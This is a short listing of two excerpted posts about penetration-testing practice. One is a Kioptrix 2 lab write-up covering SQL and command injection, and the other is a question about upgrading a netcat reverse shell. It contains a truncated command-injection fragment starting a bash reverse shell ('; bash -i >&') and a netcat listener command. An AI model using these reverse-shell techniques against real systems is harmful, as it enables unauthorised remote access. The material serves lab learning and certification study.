Kioptrix 2: Why netcat reverse shell executed in web browser via command injection bug doesn’t work?

I’ve completed kioptrix level 2 challenge via sql injection, command injection, bash reverse shell, and local privilege escalation as part of my OSCP preparation.,23/

; bash -i >& … Continue reading Kioptrix 2: Why netcat reverse shell executed in web browser via command injection bug doesn’t work?

What is the best way to upgrade a netcat low priv shell into a high priv shell [closed]

So say I ran a python reverse shell script on a victim machine and caught the connection on my machine using netcat -nvlp 4444. What would be the best way to upgrade this shell? Is there a way to import this established connection into met… Continue reading What is the best way to upgrade a netcat low priv shell into a high priv shell [closed]